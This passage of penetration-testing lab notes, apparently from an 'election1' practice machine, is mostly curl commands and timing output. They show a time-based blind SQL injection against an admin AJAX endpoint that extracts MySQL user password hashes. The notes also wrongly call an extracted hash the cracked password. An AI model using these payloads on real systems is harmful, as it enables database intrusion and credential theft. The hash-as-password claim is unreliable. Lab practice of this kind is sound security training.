cpu	0%
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR IF((SELECT COUNT(*) FROM mysql.user WHERE user="root" AND password="*9CFBBC772F3F6C106020035386DA5BBBF1249A11"), SLEEP(2), 0) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli" 
{"code":"404"}
real	2.05s
user	0.00s
sys	0.01s
cpu	0%

9CFBBC772F3F6C106020035386DA5BBBF1249A11 is the password hash of the root user. NOTICE the prefix * character.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR IF((SELECT COUNT(*) FROM mysql.user WHERE user="newuser"), SLEEP(2), 0) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli" 
{"code":"404"}
real	2.05s
user	0.01s
sys	0.00s
cpu	0%

newuser user identified in the mysql.user.user column

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR IF((SELECT COUNT(*) FROM mysql.user WHERE user="newuser" AND password LIKE "*2470C0C06DEE42FD16%"), SLEEP(2), 0) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli" 
{"code":"404"}
real	2.06s
user	0.01s
sys	0.00s
cpu	0%
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR IF((SELECT COUNT(*) FROM mysql.user WHERE user="newuser" AND password="*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19"), SLEEP(2), 0) -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli" 
{"code":"404"}
real	2.05s
user	0.00s
sys	0.01s
cpu	0%

2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19 is the password of the newuser user. Password cracked.

Interactive Graph View

Backlinks